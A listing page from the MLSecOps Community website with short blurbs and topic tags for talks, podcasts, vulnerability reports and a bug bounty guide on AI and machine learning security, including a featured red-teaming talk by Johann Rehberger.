MLSecOps Community
+00:00 GMT
Featured
44:13
# AI Security
# AI/ML Red Teaming
# Ethical Hacking
# Pen Testing
# Prompt Injection
# Threat Research

Securing AI: Red Teaming & Attack Strategies for Machine Learning Systems

Johann Rehberger
Johann Rehberger

Collections

All Collections
MLSecOps Connect: Ask the Experts
MLSecOps Connect: Ask the Experts
5 Items
MLSecOps Podcast
Learning Courses
AI Threat Research

All Content

Popular topics
# MLSecOps
# AI Security
# Supply Chain Vulnerability
# AI Risk
# Adversarial ML
# Governance, Risk, & Compliance
# Generative AI
# LLM
# Model Provenance
# Trusted AI
# AdvML
# AI/ML Red Teaming
# AI/ML Security Vulnerabilities
# Threat Research
# Model Scanning
# AI Impact
# Large Language Model
# Vulnerability Reporting
# Prompt Injection
# AI Bias
All
Wednesday, December 11th, 2024 | 11:00 AM Pacific Time
# Model Security
Click to see Giveaway Contest Official Rules and free entry form!
# Contest
Dr. Cari Miller shares insights from her work with the AI Procurement Lab regarding frameworks and strategies needed to mitigate risks in AI acquisitions.
# AI Audit
# AI Bias
# AI Risk
# Cari Miller
# Ethical AI
# Procurement
# Governance, Risk, & Compliance
# Generative AI
# Trusted AI
Join Nicole Nichols from PANW on the MLSecOps Podcast as she discusses the present and future of AI security & the growth mindset essential for cybersecurity professionals.
# AI Agents
# AI Security
# Cybersecurity
# Backdoor Attack
# LLM
# Generative AI
This report contains 34 vulnerabilities, including 3 critical and 18 high severity, found by the community at huntr.com in OSS AI/ML.
# huntr
# Protect AI
# Vulnerability Reporting
# Supply Chain Vulnerability
Protect AI and Hugging Face Partner to Secure the Machine Learning Supply Chain
# Model Scanning
# Model Security
# Supply Chain Vulnerability
Looking to get into AI/ML bug bounty hunting? To help, the team at huntr.com put together a comprehensive guide to get you started.
# AI Security
# AI/ML Red Teaming
# AI/ML Security Vulnerabilities
# Bug Bounty
# huntr
# Supply Chain Vulnerability
Sam Washko
William Armiros
Sam Washko & William Armiros · Oct 2nd, 2024
In the fast-moving world of Artificial Intelligence (AI) and Machine Learning (ML), ensuring model and data integrity is a must. Sam Washko and Will Armiros (Sr. Software Engineers, Protect AI) joined our MLSecOps Community Meetup on September 10, 2024 to talk about ML supply chain vulnerabilities and defenses. Some of their key insights on model serialization attacks, data poisoning, and the bleeding-edge tools developed to keep your AI safe are included below.
# MLSecOps
# Adversarial ML
# AI Security
# Data Poisoning
# Model Security
# Supply Chain Vulnerability
# Threat Research
22:59
Caleb Sima joins us to discuss security considerations for building and using AI, drawing on his 25+ years of cybersecurity experience.
# AI Agents
# AI Risk
# AI Security
# AI-BOM
# AI/ML Security Vulnerabilities
# ChatGPT
# Generative AI
# LLM
# Model Provenance
# Retrieval-Augmented Generation
# Supply Chain Vulnerability
This report contains 20 vulnerabilities found by the community at huntr.com in OSS AI/ML.
# huntr
# Protect AI
# Vulnerability Reporting
# Supply Chain Vulnerability
Popular
Securing AI/ML with Ian Swanson
Ian Swanson